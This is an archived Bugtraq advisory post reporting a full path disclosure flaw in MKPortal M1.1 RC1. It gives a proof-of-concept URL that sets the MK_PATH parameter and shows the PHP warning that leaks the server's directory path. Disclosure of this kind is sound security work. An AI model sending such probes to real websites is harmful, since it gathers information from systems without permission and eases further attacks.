Bugtraq mailing list archives
MKPortal Full Path Disclosure
From: info () burnhead it
Date: 8 Jan 2007 01:01:51 -0000
MkPortal Full Path Disclosure Vulnerability discovered by: Demential Web: http://headburn.altervista.org E-mail: info[at]burnhead[dot]it Mkportal website: http://www.mkportal.it Tested on MKPortal M1.1 RC1 with PhpBB other versions may also be affected. http://www.victim.com/mkportal/admin.php?MK_PATH=1 Warning: main(mkportal/include/mk_mySQL.php): failed to open stream: No such file or directory in D:\inetpub\webs\victimcom\mkportal\include\PHPBB\php_driverf.php on line 24
Current thread:
- MKPortal Full Path Disclosure info (Jan 08)